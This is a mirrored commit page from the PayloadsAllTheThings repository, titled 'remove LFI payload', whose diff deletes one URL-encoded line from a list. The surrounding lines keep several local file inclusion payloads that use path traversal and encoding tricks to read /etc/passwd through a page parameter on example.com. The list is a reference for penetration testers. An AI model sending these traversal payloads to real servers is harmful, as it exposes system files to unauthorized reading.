mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 08:54:40 +01:00
remove LFI payload
This commit is contained in:
parent
a4cc044988
commit
f0f71990ac
1 changed files with 0 additions and 1 deletions
|
|
@ -90,7 +90,6 @@ http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
|
||||||
http://example.com/index.php?page=....//....//etc/passwd
|
http://example.com/index.php?page=....//....//etc/passwd
|
||||||
http://example.com/index.php?page=..///////..////..//////etc/passwd
|
http://example.com/index.php?page=..///////..////..//////etc/passwd
|
||||||
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
|
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
|
||||||
http://example.com/index.php?page=%2F%7Betc%2C%7D%2F%7Bpasswd%2C%7D
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## Remote File Inclusion
|
## Remote File Inclusion
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue